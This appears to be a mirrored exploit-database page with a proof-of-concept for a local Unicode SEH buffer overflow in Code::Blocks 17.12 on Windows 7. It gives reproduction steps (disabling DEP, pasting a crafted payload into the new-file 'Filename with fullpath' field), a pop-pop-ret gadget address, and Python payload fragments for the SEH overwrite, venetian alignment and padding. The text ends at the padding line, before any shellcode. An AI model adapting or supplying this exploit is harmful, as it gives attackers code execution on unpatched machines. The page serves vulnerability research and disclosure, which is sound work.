Code blocks 17.12 file name local buffer overflow (unicode) (seh) (poc) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-06-17 |
Type : local |
Platform : windows
This exploit / vulnerability Code blocks 17.12 file name local buffer overflow (unicode) (seh) (poc) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
# 7.- Paste ClipBoard into the "Filename with fullpath:" .
# 8.- Click on "Finish".
# 9.- Calc.exe runs.
#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh="\xe0\x50"
ven = "\x62" #align
ven +="\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align
ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret
junk2="\x41" * 108 #required to make sure shellcode = eax